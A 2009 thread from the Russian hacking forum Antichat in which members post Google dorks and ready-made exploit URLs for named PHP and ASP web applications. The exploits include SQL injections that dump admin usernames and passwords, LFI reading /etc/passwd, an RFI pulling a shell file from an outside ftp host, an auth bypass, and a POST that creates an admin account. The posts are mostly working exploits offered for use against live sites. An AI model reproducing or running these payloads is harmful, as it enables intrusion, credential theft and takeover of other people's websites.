Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

20.04.2009, 21:16
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме: 2185909
Репутация:
308
|
|
Bahar Download Script
D
Download: http://www.aspdepo.org/indir2.asp?id=1085
Турки жгут))
Код:
http://www.site.com/patch/aspkat.asp?kid=28%20union+select+all+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+admin
ltaweb Alısveris Sistem
Download: http://www.aspindir.com/goster/5631
Код:
http://shop/urunler.asp?catno=38%20union+select+all+0,1,uname, upass,4,5,6,7,8,9,10,11,12+from+users
BloofoxCMS
Download: http://www.bloofox.com/download.21.html
magic_quotes_gpc = Off
register_globals = On
LFI:
Код:
http://site/plugins/spaw2/dialogs/dialog.php?lang=../../../../../../../../../../../../etc/passwd%00
wsCMS
Google dork: Powered by wsCMS
SQL Inj:
Код:
http://site.com/news.php?id=-1234+union+select+1,concat(username,char(58),user_ password)+from+phpbb_users+limit+1,1--
Blind SQL Inj:
Код:
http://site.com/news.php?id=1 and substring(@@version,1,1)=4
http://site.com/news.php?id=1 and substring(@@version,1,1)=5
Virtual War
Google Dork: Powered by Virtual War
Код:
http://site.com/extra/online.php?n=_member%20WHERE%20memberid=-999%20UNION%20SELECT%200,%43%4F%4E%43%41%54%28%6D% 65%6D%62%65%72%69%64%2C%30%78%33%41%2C%6E%61%6D%65 %2C%30%78%33%41%2C%70%61%73%73%77%6F%72%64%29%2C%3 2%0A%20FROM%20vwar_member%20%20/*
Online Universal Payment System System
Код:
http://site.com/index.php?read=../../../../../../../../../../etc/passwd
Последний раз редактировалось [underwater]; 20.04.2009 в 23:59..
|
|
|

21.04.2009, 14:02
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме: 7215020
Репутация:
1423
|
|
PastelCMS 0.8.0
PastelCMS 0.8.0
Сайт: http://pastel.pri.ee/
SQL-injection
При magic_quotes_gpc=off
Уязвимый код:
index.php
PHP код:
. . .
$sql_up = $mysql->query("SELECT * FROM ".$conf['mysql_prefix']."menu_struct WHERE id='$_GET[id]'");
$menu_up = $mysql->fetch_array($sql_up);
. . .
Эксплуатация:
http://site.ru/?id=-1'+union+select+1,concat_ws(0x2F,user,pass),3,4,5, 6,7,8,9,10,11,12,13,14+from+users--+
Authorization bypass
При magic_quotes_gpc=off
Уязвимый код:
admin.php
PHP код:
if($_GET['log'] == 'in') {
if($_POST['user'] != '' && $_POST['pass'] != '') {
$sql = $mysql->query("SELECT * FROM ".$conf['mysql_prefix']."users WHERE user='$_POST[user]' AND pass='".md5($_POST['pass'])."'");
$count = $mysql->num_rows($sql);
. . .
Эксплуатация:
В поле Username: ' or 1=1#
В поле Password что угодно
Последний раз редактировалось ElteRUS; 21.04.2009 в 14:09..
|
|
|

22.04.2009, 21:54
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме: 2185909
Репутация:
308
|
|
eXopera
Download: http://www.exopera.be/
Уязвимость в файле product.php:
Blind SQL Inj:
Код:
http://site.com/product.php?catid=1 and substring(@@version,1,1)=4
Код:
http://site.com/product.php?catid=1 and substring(@@version,1,1)=5
cpCommerce
Download: http://cpcommerce.cpradio.org/downloads.php
Уязвимость в файле document.php:
Blind SQL Inj:
Код:
http://site.com/document.php?id_document=1 and substring(@@version,1,1)=4
Код:
http://site.com/document.php?id_document=1 and substring(@@version,1,1)=5
|
|
|

22.04.2009, 23:21
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме: 7617458
Репутация:
3965
|
|
CMSSite Vulnerabilities
CMSSite Vulnerabilities
Found by: Dimi4 [UASC]
Date: 22.04.09
XSS ( search.php) :
Код:
http://localhost/CMSSite/search.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&x=0&y=0
LFI: admin.php
PHP код:
if(file_exists("$admin_dir/".$_REQUEST["mode"].".php") && $_REQUEST["mode"] != "delete" && $_REQUEST["mode"] != "logout")
{
include("$admin_dir/".$_REQUEST["mode"].".php");
}
Код:
/admin.php?mode=[path]//////////////////[..]
__________________
BlackHat. MoDL
|
|
|

23.04.2009, 19:17
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме: 7215020
Репутация:
1423
|
|
Limeware CMS
Сайт: http://limeware-cms.com/
SQL-injection
При magic_quotes_gpc=off
Уязвимый код:
displayNews.php
PHP код:
. . .
if (strlen($_GET['id']) > 0) {
$this->id = $_GET['id'];
} else {
$this->id = 0;
. . .
$query = sprintf("SELECT id,title,author,date,body FROM %s WHERE id = '%s'", $this->tblnews, $this->id);
$this->newsResult = $this->DB_executeQuery($query, $this->newsLink);
. . .
Эксплуатация:
site.com/index.php?type=news&block=1&id=22'+and+1=2+union+s elect+1,concat_ws(0x2F,username,password),3,4,5+fr om+tblusers--+
|
|
|

26.04.2009, 18:00
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме: 7561206
Репутация:
1861
|
|
Уязвимости Ninja Blog
Уязвимости Ninja Blog
download: http://www.ninjadesigns.co.uk/enter/blog.zip
dork: "Powered by Ninja Designs"
RFI
/entries/index.php
уязвимый код:
PHP код:
<?php
if (isset($_GET["cat"])) {
$page = $_GET["cat"].'.txt';
if (file_exists($page)) {
echo "<br /><a href=\"index.php\">< Back</a>";
@include ("$page");
эксплуатирование:
Код:
/entries/index.php?cat=ftp://login:pwd@host/shell.txt%00
(с) Iceangel_
Последний раз редактировалось Iceangel_; 26.04.2009 в 18:32..
|
|
|

26.04.2009, 23:09
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме: 3659973
Репутация:
466
|
|
TeamCal Pro Version 3.2.003
Downloads:http://www.lewe.com/index.php?option=com_docman&task=cat_view&gid=112& Itemid=45
Dork:Powered by TeamCal
можем добавить админа
уязвимый код
/addprofile.php
Код:
/**
* Check if allowed
*/
if (!checkAuth("admin")) {
// Not authorized. Get outta here
jsReload("index.php"); <- тут java-redirect!
}
эксплуатация:
Код:
/addprofile.php
отправляем POST запрос типа
username=1234567&password=1234&password2=1234&lastname=&firstname=&title=&position=&idnumber=&phone=&mobile=&email=&birthday=&opt_gender=ut_male&uo_language=english&uo_defgroup=default&lbxNotifyGroup=All&opt_usertype=ut_admin&custom1=&custom2=&custom3=&custom4=&custom5=&customFree=&customPopup=&btn_add=Add
все
admin:1234567
pass:1234
(с)Rubaka
|
|
|

27.04.2009, 11:15
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме: 7561206
Репутация:
1861
|
|
PluggedOut Blog
download: http://downloads.sourceforge.net/pluggedout/blog199i.zip
dork: "Powered by PluggedOut Blog"
LFI
уязвимый код:
index.php
PHP код:
if ( isset($_REQUEST["entryid"]) ){
if (is_numeric($_REQUEST["entryid"])){
$html = html_view_entry($_REQUEST["entryid"])
cмотрим функцию html_view_entry в файле html.php
PHP код:
function html_view_entry($entryid){
/--/
// Build the page
$html = build_page($sql_list,$sql_view,$sql_archive,$sql_categories,$sql_comments);
return $html;
cмотрим функцию build_page, в этом же файле
PHP код:
function build_page($sql_list,$sql_view,$sql_archive,$sql_categories="",$sql_comments=""){
global $theme;
// work out the current theme (allow for an override though)
if (isset($_REQUEST["theme"])){
$theme = $_REQUEST["theme"];
} else {
$theme = theme_get_name();
}
// include the theme (in order for following function calls to work)
if (file_exists("themes/".$theme."/theme.php")){
require "themes/".$theme."/theme.php";
} else {
header("Location: problem.php?f=build_page&p=theme_not_found");
}
эксплуатирование:
Код:
index.php?entryid=1&theme=../../../../../../../etc/passwd%00
(с) Iceangel_
|
|
|

28.04.2009, 00:46
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме: 2185909
Репутация:
308
|
|
FineArtPost
Download: http://www.fineartpost.com
XSS:
Код:
http://www.site.com/display_images.php?u_id=%22%3Cscript%3Ealert(1)%3C/script%3E%22
SQL Inj:
Код:
http://www.site.com/public/display_images.php?u_id=-210%20union%20select%201,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69--
minimal-ablog 0.4
Download : http://code.google.com/p/minimal-ablog/downloads/list
SQL Inj:
Код:
http://www.site.com/index.php?id=-3%20union%20select%201,version(),3,4,5,6,7,8--
Загружаем любые файлы с правами админа: http://www.site.com/admin/uploader.php
|
|
|
Уязвимости InTerra Blog Machine 1.70 |

28.04.2009, 13:37
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме: 7561206
Репутация:
1861
|
|
Уязвимости InTerra Blog Machine 1.70
Уязвимости InTerra Blog Machine 1.70
download: http://essentialmind.com/files/interra_en.zip
dork: "Powered by InTerra Blog Machine"
SQL-injection(требования: magic_quotes=off)
уязвимый код:
index.php
PHP код:
switch($_GET['action']){
/--/
case 'section': {
include("actions/section.php");
break;
}
/--/
/actions/section.php (напрямую к нему не обратится, хтаццесс в папке мешает)
PHP код:
if(eregi('(.*)/$',$_GET['section'])){
$_GET['section'] = substr($_GET['section'],0,-1);
}
//figure out section settings (if any)
if(!$section = $db->getRow("SELECT * FROM int_category WHERE name = '".$_GET['section']."'")){
//is there a page maybe? (V 1.70)
if($page = $db->getRow("SELECT * FROM int_pages WHERE url = '".$_GET['section']."'")){
/--/
эксплуатирование:
Код:
index.php?action=section§ion=1'+and+1=2+union+select+1,2,version(),4--+
PoC:
Код:
http://evilbotan.ru/?action=section§ion=1'+and+1=2+union+select+1,2,user(),4--+
(обратите внимание на имя домена, злой ботан =) )
(с) Iceangel_
Последний раз редактировалось Iceangel_; 28.04.2009 в 13:50..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|